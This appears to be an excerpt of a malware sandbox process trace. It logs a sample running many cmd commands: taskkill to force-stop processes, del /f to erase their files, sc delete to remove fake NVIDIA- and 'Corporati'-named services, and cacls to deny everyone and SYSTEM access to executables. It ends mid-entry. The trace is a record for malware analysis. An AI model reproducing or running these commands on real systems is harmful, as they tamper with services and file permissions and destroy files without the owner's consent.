C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn64.exe
2⤵
PID:3868

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\*
2⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt\Gsmarn64.exe
2⤵
PID:4780

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\Gsmarn32.exe
2⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\*
2⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn32.exe
2⤵
PID:4064

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt\Gsmarn32.exe
2⤵
PID:4116

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%Microsoft BnibabsProt00\Gsmarn64.exe
2⤵
PID:3624

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt00\*
2⤵
PID:4264

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt00\Gsmarn64.exe
2⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt00\Gsmarn64.exe
2⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Globalan.exe
2⤵
PID:3620

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Globalan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%\SystemSvlsa\Globalan.exe
2⤵
PID:2540

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemSvlsa\Globalan.exe
2⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Globalan.exe
2⤵
PID:4532

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Globalan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3824

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "NVIDIA SlibabaProtect GlobalSign"
2⤵
PID:4020

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA SlibabaProtect GlobalSign"
3⤵
- Launches sc.exe
PID:1100

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "NVIDIA SlibabaProtect GlobalSign"
2⤵
PID:2324

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA SlibabaProtect GlobalSign"
3⤵
- Launches sc.exe
PID:2860

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Nsmart64.exe
2⤵
PID:1444

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nsmart64.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Nsmart32.exe
2⤵
PID:5040

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nsmart32.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\Nsmart64.exe
2⤵
PID:224

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\*
2⤵
PID:4392

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt\Nsmart64.exe
2⤵
PID:1408

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt\Nsmart32.exe
2⤵
PID:3840

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart32.exe
2⤵
PID:3628

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\*
2⤵
PID:1344

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\Nsmart32.exe
2⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart64.exe
2⤵
PID:116

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%Microsoft AlibabaProt00\Nsmart64.exe
2⤵
PID:3508

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im NGlobalan.exe
2⤵
PID:3496

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NGlobalan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt00\Nsmart64.exe
2⤵
PID:3740

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt00\Nsmart64.exe
2⤵
PID:3220

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt00\*
2⤵
PID:3516

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%\SystemNvlsa\NGlobalan.exe
2⤵
PID:4264

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemNvlsa\NGlobalan.exe
2⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im NGlobalan.exe
2⤵
PID:328

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NGlobalan.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "NVIDIA AlibabaProtect GlobalSign"
2⤵
PID:4864

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA AlibabaProtect GlobalSign"
3⤵
- Launches sc.exe
PID:1480

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "NVIDIA AlibabaProtect GlobalSign"
2⤵
PID:1212

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA AlibabaProtect GlobalSign"
3⤵
- Launches sc.exe
PID:2424

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im NVDispla64.exe
2⤵
PID:3588

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NVDispla64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe
2⤵
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec\NVDispla64.exe
2⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\*
2⤵
PID:4136

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\NVDispla64.exe
2⤵
PID:3700

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec00\NVDispla64.exe
2⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec00\NVDispla64.exe
2⤵
PID:688

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec00\*
2⤵
PID:488

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%Microsoft NctiveStec00\NVDispla64.exe
2⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Nvdskrais.exe
2⤵
PID:852

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nvdskrais.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemBols\*
2⤵
PID:528

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemBols\Nvdskrais.exe
2⤵
PID:4276

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%SystemBols\*
2⤵
PID:3852

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%SystemBols\Nvdskrais.exe
2⤵
PID:2044

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im NVDispla64.exe
2⤵
PID:3880

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NVDispla64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec\NVDispla64.exe
2⤵
PID:3840

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Nvdskrais.exe
2⤵
PID:2820

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nvdskrais.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "NVIDIA windows dribs container"
2⤵
PID:228

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA windows dribs container"
3⤵
- Launches sc.exe
PID:2780

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "NVIDIA windows dribs container"
2⤵
PID:1128

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA windows dribs container"
3⤵
- Launches sc.exe
PID:4708

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe
2⤵
PID:796

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\*
2⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\NVDispla64.exe
2⤵
PID:1344

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Diskraid.exe
2⤵
PID:3656

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%SystemBols\Diskraid.exe
2⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemBols\Diskraid.exe
2⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Sqltem64.exe
2⤵
PID:4472

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sqltem64.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\Sqltem64.exe
2⤵
PID:3540

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\Sqltem64.exe
2⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe
2⤵
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Diskraid.exe
2⤵
PID:4968

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "dorporati windows dribe diskraid"
2⤵
PID:3524

C:\Windows\SysWOW64\sc.exe
sc delete "dorporati windows dribe diskraid"
3⤵
- Launches sc.exe
PID:2540

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "dorporati windows dribe diskraid"
2⤵
PID:3700

C:\Windows\SysWOW64\sc.exe
sc delete "dorporati windows dribe diskraid"
3⤵
- Launches sc.exe
PID:3604

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im AppVNice.exe
2⤵
PID:1096

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemBols\AppVNice.exe
2⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%SystemBols\AppVNice.exe
2⤵
PID:4916

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Systen64.exe
2⤵
PID:2044

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SystelApp\Systen64.exe
2⤵
PID:3960

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SystelApp\Systen64.exe
2⤵
PID:2936

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystelApp\Systen64.exe
2⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im AppVNice.exe
2⤵
PID:1292

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Norporati Windows AppVNice"
2⤵
PID:2884

C:\Windows\SysWOW64\sc.exe
sc delete "Norporati Windows AppVNice"
3⤵
- Launches sc.exe
PID:2756

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Norporati Windows AppVNice"
2⤵
PID:1740

C:\Windows\SysWOW64\sc.exe
sc delete "Norporati Windows AppVNice"
3⤵
- Launches sc.exe
PID:3520

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im taskger.exe
2⤵
PID:3516

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskger.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\taskger.exe
2⤵
PID:3392

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\taskger.exe
2⤵
PID:780

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im taskmgzr.exe
2⤵
PID:3252

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgzr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\taskmgzr.exe
2⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\taskmgzr.exe
2⤵
PID:4412

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\vget.vbs
2⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\vget.vbs
2⤵
PID:2264

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im assm.exe
2⤵
PID:2100

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im assm.exe
3⤵
- Kills process with taskkill
PID:968

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls assm.exe /t /e /c /d everyone
2⤵
PID:2352

C:\Windows\SysWOW64\cacls.exe
Cacls assm.exe /t /e /c /d everyone
3⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls assm.exe /t /e /c /d system
2⤵
PID:3032

C:\Windows\SysWOW64\cacls.exe
Cacls assm.exe /t /e /c /d system
3⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SqlManagement.exe
2⤵
PID:1784

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SqlManagement.exe
3⤵
PID:3140

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SqlManagement.exe /t /e /c /d everyone
2⤵
PID:3772

C:\Windows\SysWOW64\cacls.exe
Cacls SqlManagement.exe /t /e /c /d everyone
3⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SqlManagement.exe /t /e /c /d system
2⤵
PID:4968

C:\Windows\SysWOW64\cacls.exe
Cacls SqlManagement.exe /t /e /c /d system
3⤵
PID:4888

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SystemManagement.exe
2⤵
PID:4140

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SystemManagement.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SystemManagement.exe /t /e /c /d everyone
2⤵
PID:4916

C:\Windows\SysWOW64\cacls.exe
Cacls SystemManagement.exe /t /e /c /d everyone
3⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls SystemManagement.exe /t /e /c /d system
2⤵
PID:3852

C:\Windows\SysWOW64\cacls.exe
Cacls SystemManagement.exe /t /e /c /d system
3⤵
PID:2208

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im msinfo.exe
2⤵
PID:4392

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im msinfo.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2324

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls msinfo.exe /t /e /c /d everyone
2⤵
PID:3480

C:\Windows\SysWOW64\cacls.exe
Cacls msinfo.exe /t /e /c /d everyone
3⤵
PID:2240

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im rundlls.exe
2⤵
PID:852

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundlls.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls msinfo.exe /t /e /c /d system
2⤵
PID:4516

C:\Windows\SysWOW64\cacls.exe
Cacls msinfo.exe /t /e /c /d system
3⤵
PID:3856

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls rundlls.exe /t /e /c /d system
2⤵
PID:1856

C:\Windows\SysWOW64\cacls.exe
Cacls rundlls.exe /t /e /c /d system
3⤵
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls rundlls.exe /t /e /c /d everyone
2⤵
PID:4956

C:\Windows\SysWOW64\cacls.exe
Cacls rundlls.exe /t /e /c /d everyone
3⤵
PID:4656

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoy.exe
2⤵
PID:984

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoy.exe
3⤵
PID:3484

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls conhoy.exe /t /e /c /d system
2⤵
PID:2760

C:\Windows\SysWOW64\cacls.exe
Cacls conhoy.exe /t /e /c /d system
3⤵
PID:3500

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls conhoy.exe /t /e /c /d everyone
2⤵
PID:2384

C:\Windows\SysWOW64\cacls.exe
Cacls conhoy.exe /t /e /c /d everyone
3⤵
PID:2100

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im OmdBase.exe
2⤵
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im OmdBase.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3704

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls OmdBase.exe /t /e /c /d system
2⤵
PID:3584

C:\Windows\SysWOW64\cacls.exe
Cacls OmdBase.exe /t /e /c /d system
3⤵
PID:3120

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls System.exe /t /e /c /d everyone
2⤵
PID:1872

C:\Windows\SysWOW64\cacls.exe
Cacls System.exe /t /e /c /d everyone
3⤵
PID:2360

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im System.exe
2⤵
PID:3236

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im System.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4660

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls OmdBase.exe /t /e /c /d everyone
2⤵
PID:4492

C:\Windows\SysWOW64\cacls.exe
Cacls OmdBase.exe /t /e /c /d everyone
3⤵
PID:3376

C:\Windows\SysWOW64\cmd.exe
cmd /c Cacls System.exe /t /e /c /d system
2⤵
PID:704

C:\Windows\SysWOW64\cacls.exe
Cacls System.exe /t /e /c /d system
3⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spoolys.exe
2⤵
PID:2296

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolys.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im OmdBase.exe
2⤵
PID:2516

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im OmdBase.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3912

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft Maker\OmdBase.exe
2⤵
PID:4008

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows DVD Maker"
2⤵
PID:3604

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows DVD Maker"
3⤵
- Launches sc.exe
PID:4516

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows DVD Maker"
2⤵
PID:3540

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows DVD Maker"
3⤵
- Launches sc.exe
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft Maker\OmdBase.exe
2⤵
PID:4176

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft Maker\OmdBase.exe
2⤵
PID:5048

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im GthUdTask.exe
2⤵
PID:4444

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im GthUdTask.exe
3⤵
PID:796

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies GthUdTask"
2⤵
PID:1248

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2240

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies GthUdTask"
3⤵
- Launches sc.exe
PID:3304

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies GthUdTask"
2⤵
PID:3232

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies GthUdTask"
3⤵
- Launches sc.exe
PID:3476

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft GthUdTask\GthUdTask.exe
2⤵
PID:1708

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft GthUdTask\GthUdTask.exe
2⤵
PID:340

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft GthUdTask\GthUdTask.exe
2⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im BthUdTask.exe
2⤵
PID:3016

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BthUdTask.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies BthUdTask"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies BthUdTask"
3⤵
- Launches sc.exe
PID:4360

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies BthUdTask"
2⤵
PID:1324

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies BthUdTask"
3⤵
- Launches sc.exe
PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft BthUdTask\BthUdTask.exe
2⤵
PID:5044

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft BthUdTask\BthUdTask.exe
2⤵
PID:3824

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft BthUdTask\BthUdTask.exe
2⤵
PID:3768

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SvidaPctb.exe
2⤵
PID:2384

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SvidaPctb.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SvidaPctb\SvidaPctb.exe
2⤵
PID:480

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SvidaPctb\SvidaPctb.exe
2⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SvidaPctb\SvidaPctb.exe
2⤵
PID:4044

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3484

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im WavesSys.exe
2⤵
PID:1716

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WavesSys.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies WavesSys"
2⤵
PID:4808

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies WavesSys"
3⤵
- Launches sc.exe
PID:1692

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Assemblies WavesSys"
2⤵
PID:2480

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies WavesSys"
3⤵
- Launches sc.exe
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im System.exe
2⤵
PID:1808

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im System.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft StuSystem\System.exe
2⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft StuSystem\System.exe
2⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft StuSystem\System.exe
2⤵
PID:3928

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Nvdxgiwrap.exe
2⤵
PID:3500

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nvdxgiwrap.exe
3⤵
- Kills process with taskkill
PID:4360

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Nvdxgiwrap"
2⤵
PID:3676

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Nvdxgiwrap"
3⤵
- Launches sc.exe
PID:1100

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Nvdxgiwrap"
2⤵
PID:1740

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1500

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Nvdxgiwrap"
3⤵
- Launches sc.exe
PID:4824

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Rsytvcem"
2⤵
PID:1708

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Rsytvcem"
3⤵
- Launches sc.exe
PID:5056

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "Corporati Windows Rsytvcem"
2⤵
PID:5052

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows Rsytvcem"
3⤵
- Launches sc.exe
PID:3000

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Rsytvcp.exe
2⤵
PID:1796

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rsytvcp.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft Rsytvcem\Rsytvcp.exe
2⤵
PID:780

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft Rsytvcem\Rsytvcp.exe
2⤵
PID:4224

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft Rsytvcem\Rsytvcp.exe
2⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Systen64.exe
2⤵
PID:3540

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
- Kills process with taskkill
PID:3140

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SystenApp\Systen64.exe
2⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
